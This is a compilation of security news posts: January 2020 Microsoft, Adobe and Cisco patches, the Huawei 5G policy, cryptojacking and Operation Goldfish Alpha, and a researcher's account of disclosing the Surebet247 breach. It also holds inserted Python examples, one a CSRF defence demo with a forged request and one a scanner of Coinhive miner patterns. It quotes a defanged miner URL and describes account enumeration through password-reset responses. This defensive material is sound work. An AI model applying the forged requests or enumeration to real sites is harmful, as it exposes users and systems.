“The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available”.

Microsoft also addressed 48 other vulnerabilities, 8 of which are rated critical; the remaining ones are rated important.

None of the issues addressed this month by Microsoft were being exploited in the wild.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0601, hacking)

The post Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA appeared first on Security Affairs.

January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager

Adobe released its January 2020 Patch Tuesday updates that address several flaws in Illustrator and Experience Manager products.

Adobe has released its first Patch Tuesday software updates of 2020, which address several vulnerabilities in Illustrator and Experience Manager products.

“Adobe has published security bulletins for Adobe Experience Manager (APSB20-01) and Adobe Illustrator (APSB20-03). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin.” reads the security advisory.

The security updates for Illustrator CC 2019 for Windows address five critical memory corruption issues (CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714) that can lead to arbitrary code execution in the context of the targeted user.

All the vulnerabilities were reported to Adobe by Honggang Ren of Fortinet’s FortiGuard Labs.

While the vulnerabilities have been assigned a severity rating of critical, their priority rating is 3, which means Adobe does not expect any of them to be exploited in attacks.

Adobe has also released security updates for Adobe Experience Manager (AEM) that address four issues rated important and moderate (CVE-2019-16466, CVE-2019-16467, CVE-2019-16468, CVE-2019-16469).

The flaws rated important are reflected cross-site scripting (XSS) or Expression Language injection issues and could lead to the disclosure of sensitive information. The security hole rated moderate has been described as a user interface injection issue, and it can also lead to the disclosure of sensitive information.

The flaws tracked as CVE-2019-16466 and CVE-2019-16468 were reported to Adobe by the security expert Lorenzo Pirondini of Netcentric.

Pierluigi Paganini

(SecurityAffairs – Adobe Patch Tuesday, hacking)

The post January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager appeared first on Security Affairs.

Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution

Tech giant Cisco has recently addressed two high-severity vulnerabilities affecting its Webex and IOS XE Software products.

Cisco Systems has released security fixes for two high-severity vulnerabilities in its products, including a remote code execution flaw in the Webex video conferencing platform.

The Webex flaw resides in the web-based management interface of Cisco Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing.

“A vulnerability in the web-based management interface of Cisco Webex Video Mesh could allow an authenticated, remote attacker to execute arbitrary commands on the affected system.” reads the security advisory published by Cisco.

“The vulnerability is due to improper validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by logging in to the web-based management interface with administrative privileges and supplying crafted requests to the application. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system with root privileges on a targeted node.”

An authenticated, remote attacker could exploit the issue by supplying crafted requests to the application.

This flaw affects Cisco Webex Video Mesh Software releases earlier than 2019.09.19.1956m.

The vulnerability has received a CVSS score of 7.2 out of 10; the good news is that Cisco said it is not aware of any attacks exploiting the flaw in the wild.

Cisco also addressed a high-severity flaw in the web user interface of Cisco IOS and Cisco IOS XE Software that runs on Cisco routers and switches.

“A vulnerability in the web UI of Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system.” reads the Cisco security advisory.

“The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the targeted user. If the user has administrative privileges, the attacker could alter the configuration, execute commands, or reload an affected device.”

The vulnerability could be exploited by an unauthenticated, remote attacker to launch a cross-site request forgery (CSRF) attack on the vulnerable devices. An attacker could exploit the issue by tricking the victims into clicking specially-crafted links that then send a forged request to the webserver running on the device.

The attacker could exploit the vulnerability to perform arbitrary actions with the privilege level of the targeted user.

The issue affects Cisco devices that are running vulnerable releases of Cisco IOS or Cisco IOS XE Software earlier than 16.1.1 with the HTTP Server feature enabled.

The flaw was reported by Mehmet Önder Key and received a CVSS score of 8.8; Cisco is not aware of any exploits in the wild against the issue.
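The CSRF in the advisory above works because the browser attaches the device's session cookie to a request that a third-party page caused, so the web UI cannot tell a forged form submission from a legitimate one. As an added example (not Cisco's code and not a model of the IOS XE web UI), here is the minimal pair a reviewer looks for in any embedded management interface: a handler that trusts the cookie alone, and one that also demands a per-session synchronizer token and checks the request's origin. The request shape, the session store, the device origin (192.0.2.1, a documentation address) and attacker.example are all constructed placeholders.

```python
"""Synchronizer-token CSRF protection for a web management interface.

Added example; not Cisco's code and not a model of the IOS XE web UI. A
request is reduced to the fields a small embedded HTTP server would see:
method, path, headers, form body and cookies. The session store, the device
origin (192.0.2.1, a documentation address) and attacker.example are all
constructed placeholders.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

SERVER_SECRET = secrets.token_bytes(32)      # generated at boot, never sent to clients
STATE_CHANGING = {"POST", "PUT", "DELETE"}


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


def csrf_token_for(session_id):
    """Per-session token derived from a server secret. It is embedded only in
    pages we serve, so a page on another origin cannot read it to replay it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_unprotected(req, sessions):
    """Vulnerable pattern: the session cookie is the only proof of intent, and the
    browser attaches that cookie to requests caused by any site the user visits."""
    user = sessions.get(req.cookies.get("sid"))
    if user is None:
        return "401 unauthenticated"
    return f"200 {req.form.get('action')} by {user}"


def handle_protected(req, sessions, own_origin):
    """Hardened pattern: state-changing requests must carry the session's token in
    the body, and when the browser supplies Origin (or Referer) it must be ours."""
    sid = req.cookies.get("sid")
    user = sessions.get(sid)
    if user is None:
        return "401 unauthenticated"
    if req.method not in STATE_CHANGING:
        return f"200 read-only for {user}"
    sent = req.headers.get("Origin") or req.headers.get("Referer", "")
    # exact origin or a path under it; a bare prefix test would accept 192.0.2.10
    if sent and not (sent == own_origin or sent.startswith(own_origin + "/")):
        return "403 cross-origin request rejected"
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), csrf_token_for(sid).encode()):
        return "403 missing or invalid CSRF token"
    return f"200 {req.form.get('action')} by {user}"


# Constructed scenario: an administrator is logged in, then visits a page that
# auto-submits a form at the device; the browser attaches the admin's cookie.
SESSIONS = {"s3ss10n": "admin"}
OWN_ORIGIN = "https://192.0.2.1"

FORGED = Request("POST", "/admin/exec",
                 headers={"Origin": "https://attacker.example"},
                 form={"action": "reload"},
                 cookies={"sid": "s3ss10n"})
LEGIT = Request("POST", "/admin/exec",
                headers={"Origin": OWN_ORIGIN},
                form={"action": "reload", "csrf_token": csrf_token_for("s3ss10n")},
                cookies={"sid": "s3ss10n"})

if __name__ == "__main__":
    print("unprotected, forged :", handle_unprotected(FORGED, SESSIONS))
    print("protected,   forged :", handle_protected(FORGED, SESSIONS, OWN_ORIGIN))
    print("protected,   legit  :", handle_protected(LEGIT, SESSIONS, OWN_ORIGIN))
```

The token check is what carries the protection; the origin check is a cheap second layer for browsers that send the header. Note that GET handlers are passed through as read-only, which is only safe if no GET endpoint on the device changes state.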

Pierluigi Paganini

(SecurityAffairs – Cisco WebEx, hacking)

The post Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution appeared first on Security Affairs.

US officials meet UK peers to remark the urgency to ban Huawei 5G tech

U.S. officials responsible for national security and telecommunications were meeting their peers in Britain ahead of the final decision on Huawei 5G technology.

U.S. officials responsible for national security and telecommunications were meeting their peers in Britain in the attempt to convince U.K. Prime Minister Boris Johnson’s government to ban Huawei 5G technology from its networks.

“The security and resilience of the U.K.’s telecoms network is of paramount importance,” spokesman James Slack told reporters. “We have strict controls for how Huawei equipment is currently deployed in the U.K. The government is undertaking a comprehensive review to ensure the security and resilience of 5G and fiber in the U.K.”

Slack confirmed that the government is still investigating the security of the 5G network.

Senator Tom Cotton (R-Arkansas) introduced last week a new bill that would ban the sharing of intelligence with countries that use Huawei equipment on their fifth-generation (5G) networks.

Since November 2018, the US Government has invited its allies to exclude Chinese equipment from critical infrastructure and 5G architectures over security concerns.

The United States always highlighted the risks to national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy, and Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different.


The U.S. has banned the use of Huawei products in federal agencies, and in November the Federal Communications Commission voted to cut off funds for Chinese telecom equipment from Huawei and ZTE. US regulators consider Chinese equipment in US telecommunications networks a threat to homeland security.

According to U.K. security minister Brandon Lewis, the British government would make the final decision on the adoption of Huawei technology for its 5G networks “relatively soon.”

Pierluigi Paganini

(SecurityAffairs – Bronze President, hacking)

The post US officials meet UK peers to remark the urgency to ban Huawei 5G tech appeared first on Security Affairs.

Tour the RSA Conference 2020 Security Operations Center

Register now for your free tour of the RSA Conference Security Operations Center (SOC), where engineers are monitoring all traffic on the Moscone Wireless Network for security threats. The SOC is sponsored by RSA and Cisco. Sign up for a guided tour, where we’ll show real time traffic in NetWitness Packets, plus advanced malware analysis, sandboxing and threat intelligence from Cisco Threat Grid, Threat Response and Umbrella, and protection from Cisco Next-Gen Firewall.

At the SOC, you will receive a security briefing and have time for Q&A with RSA and Cisco engineers.

Advance registration is highly recommended. Below are the available tour times. Please fill out the RSA SOC Tour Request Form to request your spot.

SOC Tours Offered Tues-Thurs (25-27 February 2020):

  • 10:30
  • 11:30
  • 1:00
  • 2:00
  • 3:00 (not on Thursday)

Please meet at the Cisco Threat Wall, which is located at the base of the escalator in the North Hall, where a Cisco team member will escort the group to the SOC (max. 25 persons per tour).

Also, plan to attend the official out briefing on the observations for RSAC 2020:

Abstract:  In this session we share our experience monitoring the RSAC network for stability, security, and stats of interest. We’ll talk about what changes we’ve seen over the years, informative and comical experiences from the trenches, and what we think it means for our industry going forward. So, if you’d like to see what a network looks like when its users know security, know its challenges, should know better, and choose to ignore all of that anyway; join us for the RSAC SOC report.

You may also be interested in reading The 1st Annual RSAC SOC Report.

The post Tour the RSA Conference 2020 Security Operations Center appeared first on Cisco Blogs.

Datacenter Security: How to Balance Business Agility with Great Protection

When IDC consults with enterprise customers or performs worldwide surveys, security is invariably an acute concern. That’s regardless of geography, industry, and identity of respondent (executive, LoB, IT, DevOps, etc.). While the challenge of providing protection and security extends across all places in the network, the problem is especially vexing in the datacenter.

There’s good reason for that, of course. The parameters of the datacenter have been redrawn by the unrelenting imperative of digital transformation and the embrace of multicloud, which together have had substantive implications for workload protection and data security.

As workloads become distributed – residing in on-premises enterprise datacenters, in co-location facilities, in public clouds, and also in edge environments – networking and network-security challenges proliferate and become more distributed in nature. Not only are these workloads distributed, but they’re increasingly dynamic and portable, subject to migration and movement between on-premises datacenters and public clouds.

Data proliferates in lockstep with these increasingly distributed workloads. This data can inform and enhance the digital experiences and productivity of employees, contractors, business partners, and customers, all of whom regularly interact with applications residing across a distributed environment of datacenters. The value of datacenters is ever greater, but so are the risks of data breaches and thefts, perpetrated by malevolent parties that are increasingly sophisticated.

In that cloud is not only a destination but also an operating model, the rise of cloud-native applications and DevOps practices have added further complications. As DevOps teams adopt continuous integration and continuous deployment (CI/CD) to keep up with the need for business speed and as developers leverage containers and microservices for agility and simplicity, traditional security paradigms – predicated on sometimes rigid controls and restrictions – are under unprecedented pressure. For enterprises, the choice seems to be between the agility of cloud and cloud-native application environments on one side and the control and safety of traditional datacenter-security practices on the other.

Perhaps that isn’t true, though. There is a way to move forward that gives organizations both agility and effective security controls, without compromise on either front. Put another way, there needn’t be a permanent unresolved tension between the need for business agility and the requirement for strong security, capable of providing the controls that organizations want while aligning more closely with business outcomes.

The first step toward this goal involves achieving visibility. If you can’t see threats, you can’t protect against them. This visibility must be both pervasive and real-time, capable of sensing and facilitating responses to anomalies and threats that span users, devices, applications, workloads, and processes (workflow). From a network standpoint, visibility must be available within datacenters – into north-south and east-west traffic flows – between them, and out to campus and branch sites as well as to clouds. The visibility should extend up the stack, too, all the way to application components and behavior, giving organizations views into potentially malicious activity such as data exfiltration and the horizontal spread of malware from server to server.

Once visibility is achieved, organizations can leverage the insights it provides to implement policy-based segmentation comprehensively and effectively, mitigating lateral propagation of attacks within and between datacenters and preventing bad actors from gaining access to high-value datacenter assets.

The foundations of visibility and policy-based segmentation, in turn, facilitate a holistic approach to threat protection, helping to establish an extensive network of capabilities and defenses that can quickly detect and respond to threats and vulnerabilities before they result in data loss or prohibitively costly business disruptions.

While it might seem that cloud-era business agility and effective security are irreconcilable interests, there is a path forward that merges the two in unqualified alignment.

For more information, see the Cisco-IDC webinar.


The post Datacenter Security: How to Balance Business Agility with Great Protection appeared first on Cisco Blogs.

This Week in Security News: INTERPOL Collaboration Reduces Cryptojacking by 78% and Three Malicious Apps Found on Google Play May be Linked to SideWinder APT Group

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how Trend Micro’s collaboration with INTERPOL’s Global Complex for Innovation helped reduce cryptojacking by 78% in Southeast Asia. Also, read about three malicious apps in the Google Play Store that may be linked to the SideWinder threat group.

Read on:

First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group

Trend Micro found three malicious apps in the Google Play Store that work together to compromise a device and collect user information. The three malicious apps — disguised as photography and file manager tools — are likely to be connected to SideWinder, a known threat group that has reportedly targeted military entities’ Windows machines.

Operation Goldfish Alpha Reduces Cryptojacking Across Southeast Asia by 78%

Interpol announced the results of Operation Goldfish Alpha, a six-month effort to secure hacked routers across the Southeast Asia region. The international law enforcement agency said its efforts resulted in a drop of cryptojacking operations across Southeast Asia by 78%, compared to levels recorded in June 2019. Private sector partners included the Cyber Defense Institute and Trend Micro.

Celebrating Decades of Success with Microsoft at the Security 20/20 Awards

Trend Micro, having worked closely with Microsoft for decades, is honored to be nominated for the Microsoft Security 20/20 Partner awards in the Customer Impact and Industry Changemaker categories. Check out this blog for more information on the inaugural awards and Trend Micro’s recognitions.

Security Predictions for 2020 According to Trend Micro

Threat actors are shifting and adapting in their choice of attack vectors and tactics — prompting the need for businesses and users to stay ahead of the curve. Trend Micro has identified four key themes that will define 2020: a future that is set to be Complex, Exposed, Misconfigured and Defensible. Check out Digital Journal’s Q&A with Greg Young, vice president of cybersecurity at Trend Micro, to learn more about security expectations for this year.

The Everyday Cyber Threat Landscape: Trends from 2019 to 2020

In addition to security predictions for the new year, Trend Micro has listed some of the biggest threats from 2019 as well as some trends to keep an eye on as we begin 2020 in this blog. Many of the most dangerous attacks will look a lot like the ones Trend Micro warned about in 2019.

5 Key Security Lessons from the Cloud Hopper Mega Hack

In December 2019, the U.S. government issued indictments against two Chinese hackers who were allegedly involved in a multi-year effort to penetrate the systems of companies managing data and applications for customers via the computing cloud. The men, who remain at large, are thought to be part of a Chinese hacking collective known as APT10.

The Summit of Cybersecurity Sits Among the Clouds

Shifts in threats in the security landscape have led Trend Micro to develop Trend Micro Apex One™, a newly redesigned endpoint protection solution. Trend Micro Apex One™ brings enhanced fileless attack detection and advanced behavioral analysis and combines Trend Micro’s powerful endpoint threat detection capabilities with endpoint detection and response (EDR) investigative capabilities.

New Iranian Data Wiper Malware Hits Bapco, Bahrain’s National Oil Company

Iranian state-sponsored hackers have deployed a new strain of data-wiping malware on the network of Bapco, Bahrain’s national oil company. The incident took place on December 29th and didn’t have the long-lasting effect hackers might have wanted, as only a portion of Bapco’s computer fleet was impacted and the company continued to operate after the malware’s detonation. 

Ransomware Recap: Clop, DeathRansom, and Maze Ransomware

As the new year rolls in, new developments in different ransomware strains have emerged. For example, Clop ransomware has evolved to integrate a process killer that targets Windows 10 apps and various applications; DeathRansom can now encrypt files; and Maze ransomware has been targeting U.S. companies, stealing and encrypting their data, as the Federal Bureau of Investigation (FBI) has warned.

4 Ring Employees Fired for Spying on Customers

Smart doorbell company Ring said that it has fired four employees over the past four years for inappropriately accessing customer video footage. The disclosure comes in a recent letter to senators from Amazon-owned Ring as it attempts to defend the privacy of its platform, which has been plagued by data privacy incidents over the past year.

Web Skimming Attack on Blue Bear Affects School Admin Software Users

A web skimming attack was recently used to target Blue Bear, a school administration software that handles school accounting, student fees, and online stores for educational institutions. Names, credit card or debit card numbers, expiration dates and security codes, and Blue Bear account usernames and passwords may have been collected.

Patched Microsoft Access ‘MDB Leaker’ (CVE-2019-1463) Exposes Sensitive Data in Database Files

Researchers uncovered an information disclosure vulnerability (CVE-2019-1463) affecting Microsoft Access, which occurs when the software fails to properly handle objects in memory. The vulnerability, dubbed “MDB Leaker” by Mimecast Research Labs, resembles a patched information disclosure bug in Microsoft Office (CVE-2019-0560) found in January 2019.

Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers

A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used to host the command for downloading the main shell script. The miner, a multi-component threat, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials.

What are your thoughts on the rise of cryptomining malware and cryptojacking tactics? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: INTERPOL Collaboration Reduces Cryptojacking by 78% and Three Malicious Apps Found on Google Play May be Linked to SideWinder APT Group appeared first on .

INTERPOL Collaboration Reduces Cryptojacking by 78%

Cybercriminals are often seen as having the upper hand over the “white hat” community. After all, they’re anonymous, can launch attacks from virtually anywhere in the world, and usually have the element of surprise. But there’s one secret weapon the good guys have: Collaboration. That’s why Trend Micro has always prioritized its partnerships with law enforcement, academia, governments and other cybersecurity businesses.

We’re proud to have contributed to yet another successful collaborative operation with INTERPOL Global Complex for Innovation (IGCI) in Singapore that’s helped to reduce the number of users infected by cryptomining malware by 78%.

Cryptomining On The Rise

Also known as cryptojacking, these attacks have become an increasingly popular way for cybercriminals to make money.

Why?

Because victims don’t know they’ve been infected. The malware sits on their machine in the background mining for digital currency 24/7/365. Increasingly, hackers have taken to launching sophisticated attacks against enterprise IT systems and cloud servers to increase their mining and earning potential. But many still target home computer systems like routers, as these are often left relatively unprotected. Stitch enough of these devices together in a botnet and they have a ready-made cash cow.

That’s why cryptojacking remained the most detected threat in the first half of 2019 in terms of file-based threat components, according to our data.

Unlike serious data breaches, phishing attacks, ransomware and banking Trojans, cryptojacking doesn’t have a major impact on the victim. They don’t lose sensitive personal data, there’s no risk of follow-on identity fraud and they’re not extorted for funds by being locked out of their PC.

However, it’s not without consequences: Cryptomining malware can slow your home network to a crawl while running up serious energy bills. It may even bring your home computers to a premature end. Also, there’s always the risk with any kind of malware infection that hackers may switch tactics and use their footprint on your home machines to launch other attacks in the future.

Enter Operation Goldfish Alpha

That’s why we were keen to offer our assistance to INTERPOL during this year’s Operation Goldfish Alpha. Thanks to our broad global visibility into attack trends and infection rates, we were able to articulate the scale of the cryptojacking threat and key mitigation steps, at a pre-operation meeting with ASEAN law enforcement officers in June.

A few months later, we developed and disseminated a key Cryptojacking Mitigation and Prevention guidance document. It details how a vulnerability in MikroTik routers had exposed countless users in the region to the risk of compromise by cryptomining malware. The document explains how to scan for this flaw using Trend Micro HouseCall for Home Networks, and how HouseCall can be used to detect and delete the Coinhive JavaScript that hackers were using to mine for digital currency on infected PCs.
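The guidance document above describes detecting and removing the Coinhive JavaScript from infected pages. The scanner below is an added example of that kind of indicator-based detection, not Trend Micro HouseCall's logic: it runs a small set of Coinhive indicators (the widely published script host, loader filename and miner constructor names, which are assumptions of this example rather than something the page lists) over page source, separates strong indicators from a generic one, and lists which external scripts triggered. The three sample pages are constructed, and SITEKEY_PLACEHOLDER stands in for a real site key.

```python
"""Indicator scan for in-browser cryptomining (Coinhive-style) script injection.

Added example; not Trend Micro HouseCall's detection logic. The indicators are
the widely published Coinhive artefacts (its script host, loader filename and
miner constructor names); the sample pages are constructed here, and
SITEKEY_PLACEHOLDER stands in for a real site key.
"""
import re

# (name, pattern, strong?) - a bare .start() call is too generic to act on alone.
INDICATORS = [
    ("coinhive-loader", re.compile(r"coinhive\.min\.js", re.I), True),
    ("coinhive-host", re.compile(r"(?:^|[/\s\"'])coin-?hive\.com", re.I), True),
    ("coinhive-miner-ctor", re.compile(r"\bCoinHive\.(?:Anonymous|User|Token)\s*\(", re.I), True),
    ("miner-start-call", re.compile(r"\.start\s*\(\s*\)", re.I), False),
]
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.I)


def external_scripts(html):
    """Return the src URLs of all external <script> tags in the page."""
    return SCRIPT_SRC.findall(html)


def scan_page(html):
    """Match every indicator against the page; report the hits, which external
    scripts match a strong indicator, and whether the page is likely mining."""
    hits = [name for name, pat, _ in INDICATORS if pat.search(html)]
    strong = [name for name, _, is_strong in INDICATORS if is_strong and name in hits]
    suspicious = [src for src in external_scripts(html)
                  if any(pat.search(src) for _, pat, is_strong in INDICATORS if is_strong)]
    return {"hits": hits, "suspicious_scripts": suspicious, "miner_likely": bool(strong)}


def triage(pages):
    """Scan a mapping of name -> HTML and return the names that look infected."""
    return sorted(name for name, html in pages.items() if scan_page(html)["miner_likely"])


# Constructed sample pages (not real captures).
SAMPLE_PAGES = {
    "clean": ('<html><head><script src="/static/app.js"></script></head>'
              '<body><button onclick="app.start()">Go</button></body></html>'),
    "injected": ('<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
                 "<script>var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER', {throttle: 0.3});"
                 ' miner.start();</script></head><body>Welcome</body></html>'),
    "renamed-host": ('<script src="https://cdn.example/js/cnhv.js"></script>'
                     "<script>new CoinHive.User('SITEKEY_PLACEHOLDER', 'user1').start();</script>"),
}

if __name__ == "__main__":
    for name, html in SAMPLE_PAGES.items():
        print(name, scan_page(html))
    print("likely infected:", triage(SAMPLE_PAGES))
```

The "renamed-host" sample is why the constructor name is kept as an indicator alongside the host: a miner loader copied to another CDN still has to call the library's API. String indicators like these are cheap to evade, so on a real network they belong next to behavioural signals (sustained CPU use from a browser tab, WebSocket traffic to mining pools) rather than on their own.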

Spectacular Success

Over the five months of Operation Goldfish Alpha, experts from national Computer Emergency Response Teams (CERTs) and police across 10 countries in the region worked to locate the infected routers, notify the victims and use our guidance document to patch the bugs and kick out the hackers.

Having helped to identify over 20,000 routers in the region that were hacked in this way, we’re delighted to say that by November, the number had reduced by at least 78%.

That’s the value of partnerships between law enforcement and private cybersecurity companies: They combine the power of investigative policing with the detailed subject matter expertise, visibility and resources of industry experts like us. We’ll continue to lend a hand wherever we can to make our connected, digital world a safer place.

The post INTERPOL Collaboration Reduces Cryptojacking by 78% appeared first on .

The Difficulty of Disclosure, Surebet247 and the Streisand Effect


This is a blog post about disclosure, specifically the difficulty with doing it in a responsible fashion as the reporter whilst also ensuring the impacted organisation behaves responsibly themselves. It's not a discussion we should be having in 2020, a time of unprecedented regulatory provisions designed to prevent precisely the sort of behaviour I'm going to describe in this post. Here you're going to see - blow by blow - just how hard it is for those of us with the best of intentions to deal with organisations who have a very different set of priorities. This is a post about how hard disclosure remains and how Surebet247's behaviour now has them experiencing the full blown Streisand effect.

It began with this email:


I get these every single day. Seriously, the flood of data that reaches my inbox is hard to describe it's that incessant. It's not always legit, mind you, and I invest a great deal of effort in establishing the authenticity of an alleged breach before loading it into Have I Been Pwned (HIBP). I've written before about how I verify breaches and it didn't take long to be pretty confident that per the subject line of the email above, Surebet247 (a Nigerian gambling website) had suffered a data breach. I'm going to save how I established that for a little later as it'll form part of the subsequent messages I sent them, the main thing for now is that as soon as I was sufficiently confident of the data's authenticity I fired off an email to their published support address:


The message was received. It must have been because the following response immediately came back:


I don't know how much of Office 365 sending the email directly to junk can be attributed to its automated nature, how much is related to its country of origin and how much is due to a missing DMARC record. But that's not the point - the email was received and then... crickets. A couple of days later and without response, I sought the support of Tefo Mohapi, a journalist in South Africa I worked with on the massive Master Deeds breach in 2017. I often use journalists I trust like Tefo to get in touch with unresponsive companies as they're very good at making them sit up and pay attention. And that's where things started to get weird.

With his permission, I'm sharing some of the communication Tefo subsequently had with the company because it's an important part of the narrative as it relates to disclosure. He managed to get a response via Twitter DM pretty promptly, albeit one that didn't really inspire much confidence they were taking this seriously:


One thing you'll notice in Tefo's first message is the screen grab showing multiple different database backups (and a single .sql file) indicating they came from different services (my original disclosure email also mentions this). You see, whilst the message that came to me only indicated Surebet247, the ZIP file I was sent included a total of 6 different databases from different services. You'll see those referenced again a little later on but the main thing for now is that regardless of the origin of the breach(es) or whose actual system suffered it, there was very likely data involved that customers had provided directly to Surebet247. They are the organisation people entrusted with their personal information and they are accountable for what happens to it after that.

Also experiencing nothing but crickets, a couple of days later Tefo follows up with Surebet247 to ask them how they're progressing:


"That is ours to decide." Seriously? That's how you're going to handle this breach? It was becoming apparent that Surebet247 was not intending to set an exemplary example of breach response. Now many days in and having exhausted all reasonable avenues to drive Surebet247 towards appropriate handling of the incident, Tefo wrote about how Nigeria's SureBet247 has suffered a potential security breach. He wrote about our attempts to alert them to the incident, the contents of the breach and about their "nonchalant attitude". He also wrote about the other betting operators implicated in the database backups and how there appeared to be a common thread across them. Suddenly, he had their attention. And they weren't happy.

I'll refrain from posting the entire messages he received as they were a bit, well, "legal", but they came from a combination of Surebet247's founder, Sheriff Olaniyan, and a south African attorney they'd retained. The former stated that they "seriously frown at this malicious news been [sic] promoted by your organization" and that they "will not hesitate to take legal action if you don't stop and bring this down". It continued with "No customer data of ours was hacked or exposed" and that Tefo's story amounted to "fake news" (yes, seriously, they went Trump on him). Now, keep in mind that at this stage nobody from Surebet247 had replied to me and subsequently, nobody had seen the data I'd been sent. Yet somehow - magically - they had determined they were in the clear.

Changing pace for just a moment, I want to throw Surebet247 a bone (it's the only one they'll get) because it does look like they had reason for some initial suspicion. Within Sheriff's message to Tefo he also said that "your informant was asking for payment and this was demanded from us". In subsequent discussions, Tefo and I concluded that this was very likely correct: someone in possession of the data was shaking them down for cash. Clearly this is not only unethical but also outright illegal and it would help explain Surebet247's apprehension when approached by other parties about the incident. But that's where the bone-throwing ends as clearly both Tefo's and my own intentions were entirely ethical and it would take about 3 minutes of Googling to work out who we both were and where our moral compasses on such issues point. I understand them being skittish, but shooting the messenger doesn't make for good incident response.

Around the same time as the founder's threatening message, Surebet247 elected to go full Iraqi Information Minister on the situation:

There were many very appropriate responses posted to that tweet (there's huge comedic value in that firewall comment), but I feel this one provides the best summary of their position:

Once again, keep in mind that as yet, Surebet247 had yet to reply to a single message I'd sent them and did not have the data I'd received, certainly not directly from me and I've seen no evidence to date they'd received it from anyone else either. Assuming they based that tweet on Tefo's story, there was absolutely no basis for them to make that statement.

Becoming increasingly frustrated, I tweeted but refrained from naming them specifically whilst I considered how to proceed:

My gut reaction was that if they wanted to take this discussion onto the public timeline then a series of rebuttal tweets would be appropriate. I drafted them, sat on them for a while then decided against it. I don't want to see this sort of thing play out on the public timeline, not unless other reasonable approaches have been exhausted so I took the drafts and 14 hours after their denial tweet, DM'd them instead:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

There were 4 subsequent images in the DM thread, the first of which was of the original email to their support address. The second 2 demonstrated the enumeration vector on their password reset feature which confirmed emails in the alleged breach presently exist in their system. Conversely, fabricated emails which wouldn't exist on their system produced an error message. Here are those 2 images:


That alone gives me a huge degree of confidence in the legitimacy of the breach (I tested a handful of addresses and they consistently produced the same results), but hey, why stop there? I sent a 4th image showing the registration feature confirming that usernames in the breach exist in the online system:


A day passed. Two days passed. Nothing. These guys really want to do this the hard way, don't they?! Expecting them to go down kicking and screaming, I reached out to a handful of my HIBP subscribers who also appeared in the breach and asked them 3 simple questions:


With 3M subscribers in my service, I've always got a good sample set that crosses over with any sizeable breach I come across and as such, I've always got candidates willing to help with breach verification. I fired off the emails and waited.

At the same time, instead of acquiescing to Surebet247's bullying tactics, Tefo upped the ante further by writing a second article after reaching out to Nigeria's National Information Technology Development Agency (NITDA) who had the following to say:

The Director-General, and CEO of NITDA, Mr. Kashifu Inuwa Abdullahi, gave an order for the incident to be investigated by NITDA's Data Breach Investigation Team.

This, of course, is precisely what we'd expect of a regulator and I'll be eagerly awaiting the outcome of that investigation. Speaking of eagerly awaiting, it didn't take long to get a response to my HIBP subscriber outreach emails with a reply promptly coming back from a gentleman named Stefan. Stefan confirmed that he'd used the Surebet247 service in the past and gave me his month of birth. It matched perfectly to the data in the alleged breach. I reverted with his day of birth and in turn, he confirmed it was accurate. Lastly, curious about his European name, I asked him which country he was from and he replied with a single word:

Germany.

Oh, now it's interesting! Once you start dealing with the personal information of EU data subjects it invokes the whole GDPR discussion, a fact that Tefo quickly jumped on and used as material for a third article about how Surebet247 is in violation of the European Union's GDPR.

I also asked another question in the original email I haven't touched on yet: "approximately when did you register"? In Stefan's initial response, he advised that "The first newsletter I found is from 13 feb 2014" (obviously Stefan likes to hold onto all his mail). However, this didn't line up with the data which suggested the registration date was "2016-09-19". I shared that data point with him and he came back with a really interesting explanation:

On 27 sep 2016 I got an email concerning "Migrations Challenges" (telling me that all balances are secure). So, maybe on 19 sep 2016 they migrated to another platform and "registered" everyone per that date?

Sure enough, further inspection of the data showed thousands of records all "registered" on that same day: 19 September 2016, a mere 8 days before the company sent an email about "Migration Challenges".

Another HIBP subscriber responded:

Yes, I know surebet247 service, a betting bookmaker based in my country Nigeria. I cannot recall the date I registered, but I know that it's earlier than 2019, my account there should be over 2 years old. My month of birth is October.

Surebet247 user? Check.

Registered more than 2 years ago? Check.

Born in October? Check.

Every single response I got from every single subscriber that replied to my request for support confirmed precisely the information contained in the "alleged" breach. Now, I ask you: what are the chances that someone sent me a trove of data with so many independently correlating points and yet "no customer data of ours was hacked or exposed", as Sheriff phrased it? If Surebet247 was to offer odds on the likelihood that they'd been breached, they'd be very short odds indeed!

